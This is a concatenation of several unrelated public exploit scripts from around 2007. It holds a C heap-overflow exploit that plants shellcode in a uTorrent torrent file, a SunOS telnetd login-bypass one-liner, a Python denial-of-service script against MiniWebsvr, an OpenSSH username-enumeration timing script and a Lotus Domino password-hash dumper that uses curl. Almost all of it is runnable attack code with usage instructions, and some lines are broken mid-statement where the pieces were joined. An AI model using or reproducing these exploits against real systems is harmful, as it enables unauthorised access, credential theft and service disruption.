/*
* This is a PoC remote exploit for uTorrent 1.6
*
* Author:
* defsec <defacedsecurity@hotmail.com>
* http://www.defacedsecurity.com
*
*
* Works on XP SP1 and  w2k sp1-4
*
*/

#include <stdio.h>
#include <stdlib.h>

#define NASIZE 4880

unsigned char nice_announce[NASIZE];
unsigned char xorops[]="\x33\xc0\x33\xdb";

// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
unsigned char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x46\x42\x30\x5a";

//msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for 
win2k sp3/sp4
unsigned char jmptosc[] = "\xeb\x04\
\xa7\x2c\xc2\x77\
\x33\xc0\xb0\x11\xc1\xe0\x08\x5b\x5b\x5b\x2b\xd8\xff\xe3";

int main(int argc,char *argv[])
{
    FILE * pFile;
    long lSize;
    char * buffer;
    size_t result;

    long i = 0;
    long j = 0;
    long lPtrIndex;
    long lHeadSize;
    long lTailSize;
    char * curptr;
    char * alptr;
    char * torrentTail;
    
    if (argc < 2)
    {
        printf("\n[uTorrent 1.6] Heap Overflow Exploit - by 
[DEFACEDSECURITY]");
        printf("\n\nUsage: ");
        printf("%s",argv[0]);
        printf(" <TorrentFile>\n");
        return 0;
    }
    
    pFile = fopen (argv[1],"rb");
    if (pFile==NULL)
    {
        fputs ("File error",stderr);
        return 0;
    }

    // obtain file size:
    fseek (pFile ,0,SEEK_END);
    lSize = ftell (pFile);
    rewind (pFile);

    // allocate memory to contain the whole file:
    buffer = (char*) malloc (sizeof(char)*lSize);
    if (buffer == NULL)
    {
        fputs ("Memory error",stderr);
        return 0;
    }

    // copy the file into the buffer:
    result = fread (buffer,1,lSize,pFile);
    if (result != lSize)
    {
        fputs ("Reading error",stderr);
        return 0;
    }

    fclose (pFile);

    /* find announce / announce-list and erase it */
    alptr = (char *) strstr(buffer,"announce");
    if (alptr == NULL)
    {
        printf("\ninvalid torrent file");
        return 0;
    }

    curptr = (char *) strstr(alptr, "7:comment");
    lHeadSize = curptr - buffer ;
    lTailSize = lSize - lHeadSize;

    torrentTail = (char *) malloc (sizeof(char)*lTailSize);
    memcpy(torrentTail,curptr,lTailSize);

    /* generate offending header */
    strcpy(nice_announce,"d8:announce4864:");
    for (lPtrIndex = 16; lPtrIndex <= 4864+16; lPtrIndex++)
        nice_announce[lPtrIndex] = 0x90;
    lPtrIndex = 84;
    memcpy(nice_announce + lPtrIndex ,xorops,sizeof(xorops)-1);
    lPtrIndex += sizeof(xorops) -1;
    memcpy(nice_announce+lPtrIndex,shellcode, sizeof(shellcode)-1);
    for (lPtrIndex = 4438; lPtrIndex<4458; lPtrIndex++,i++)
        nice_announce[lPtrIndex] = jmptosc[i];

    /* get head and tail together into a file */
    curptr = (char *) malloc(sizeof(char)*(NASIZE+lTailSize));
    for (i=0;i<NASIZE;i++)
        curptr[i] = nice_announce[i];
    for (;i<(NASIZE+lTailSize);i++,j++)
        curptr[i] = torrentTail[j];

    /* write to file and exit */
    pFile = fopen ( "output.torrent" , "wb" );
    if (pFile==NULL)
    {
        fputs ("File error",stderr);
        return 0;
    }
    fwrite(curptr, sizeof(char), (NASIZE+lTailSize), pFile);
    fclose (pFile);

    return 1337; //:)
}

#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope 
kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1
==================================================================
ПО: MiniWebsvr <= 0.0.6

import socket

print
"-----------------------------------------------------------------------"
print "MiniWebsvr 0.0.6 (0-Day) Resource Consumption"
print "url: http://miniwebsvr.sourceforge.net/"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "Run this exploit and take a look to the CPU usage."
print
"-----------------------------------------------------------------------"

host = "127.0.0.1"
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   for i in range (0,3):
       request =  "GET /prn.htm HTTP/1.1 \n\n"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       print i
except:
   print "Unable to connect. exiting."

Exploit:
#!/bin/bash

#
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
#
# raptor_sshtime - [Open]SSH remote timing attack exploit
# Copyright (c) 2006 Marco Ivaldi 
#
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
# sends an error message when a user does not exist, which allows remote
# attackers to determine valid usernames via a timing attack 
(CVE-2003-0190).
#
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and 
versions,
# and possibly under limited configurations, allows remote attackers to
# determine valid usernames via timing discrepancies in which responses 
take
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
# NOTE: as of 20061014, it appears that this issue is dependent on the 
use of
# manually-set passwords that causes delays when processing /etc/shadow 
due to
# an increased number of rounds (CVE-2006-5229).
#
# This is a simple shell script based on expect meant to remotely analyze
# timing differences in sshd "Permission denied" replies. Depending on 
OpenSSH
# version and configuration, it may lead to disclosure of valid usernames.
#
# Usage example:
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#

# Some vars
port=22

# Command line
host=$1
dict=$2

# Local functions
function head() {
    echo ""
    echo "raptor_sshtime - [Open]SSH remote timing attack exploit"
    echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
    echo ""
}

function foot() {
    echo ""
    exit 0
}
    
function usage() {
    head
    echo "[make sure the target hostkey has been approved before]"
    echo ""
    echo "usage  : ./sshtime <target> <wordlist>"
    echo "example: ./sshtime 192.168.0.1 dict.txt"
    foot
}

function notfound() {
    head
    echo "error  : expect interpreter not found!"
    foot
}

# Check if expect is there
expect=`which expect 2>/dev/null`
if [ $? -ne 0 ]; then
    notfound
fi

# Input control
if [ -z "$2"  ]; then
    usage
fi

# Perform the bruteforce attack
head

for user in `cat $dict`
do
    echo -ne "$user@$host\t\t"
    (time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l 
$user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof 
{exit}}") 2>&1 | grep real
done

foot

Exploit:
#!/bin/bash

#
# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $
#
# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump
# Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" 
enabled,
# stores sensitive data from names.nsf in hidden form fields, which allows
# remote attackers to read the HTML source to obtain sensitive 
information such
# as (1) the password hash in the HTTPPassword field, (2) the password 
change
# date in the HTTPPasswordChangeDate field, (3) the client platform in the
# ClntPltfrm field, (4) the client machine name in the ClntMachine 
field, and
# (5) the client Lotus Domino release in the ClntBld field, a different
# vulnerability than CVE-2005-2696 (CVE-2005-2428).
#
# According to testing, it's possible to dump all HTTPPassword hashes 
using the
# $defaultview view instead of $users. This saves a considerable amount 
of time.
#
# The code may require some changes to properly work with your 
configuration.
#
# See also:
# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml
#
# Usage:
# $ ./raptor_dominohash 192.168.0.202
# [...]
# Extracting the view entries...
# Done! 656 unique entries have been found.
# Now ready to dump password hashes...
# [...]
# 
[http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3]
# FirstName:      Foo
# LastName:       Bar
# ShortName:      fbar
# HTTPPassword:   (355E98E7C7B59BD810ED845AD0FD2FC4)
# [...]
#
# Vulnerable platforms:
# Lotus Domino R6 Webmail [tested]
# Lotus Domino R5 Webmail [untested]
# Lotus Domino R4 Webmail? [untested]
#

# Some vars
i=1
tmp1=dominohash1.tmp
tmp2=dominohash2.tmp

# Command line
host=$1

# Local fuctions
function header() {
    echo ""
    echo "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump"
    echo "Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>"
    echo ""
}

function footer() {
    echo ""
    exit 0
}

function usage() {
    header
    echo "usage  : ./raptor_dominohash <host>"
    echo "example: ./raptor_dominohash 192.168.0.202"
    footer
}

function notfound() {
    header
    echo "error  : curl not found"
    footer
}

# Check if curl is there
curl=`which curl 2>/dev/null`
if [ $? -ne 0 ]; then
    notfound
fi

# Input control
if [ -z "$1"  ]; then
    usage
fi

# Remove temporary files
rm -f $tmp1
rm -f $tmp2

header

# Extract the view entries
echo "Extracting the view entries..."
while :
do
    curl 
"http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 
2>/dev/null | grep unid >> $tmp1

    # Check grep return value
    if [ $? -ne 0 ]; then
        break
    fi

    # Go for the next page
    i=`expr $i + 30`
    echo -ne "\b\b\b\b\b\b\b\b$i"
done

cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort 
| uniq > $tmp2

# Check if some view entries have been found
if [ ! -s $tmp2 ]; then
    echo "No entries found on host ${host}!"
    footer
fi
echo -ne "\b\b\b\b\b\b\b\bDone! "
echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found."
echo ""

# Perform the hash dumping
echo "Now ready to dump password hashes..."
echo ""
sleep 4
for unid in `cat $tmp2`
do
    echo "[http://${host}/names.nsf/\$defaultview/${unid}]"
    echo ""
    #curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 
2>/dev/null | egrep '"FullName"|"HTTPPassword"'
    curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 
2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' 
| awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' 
'{print $1 ":\t" $2}' | tr -d '">'
    echo ""
done

footer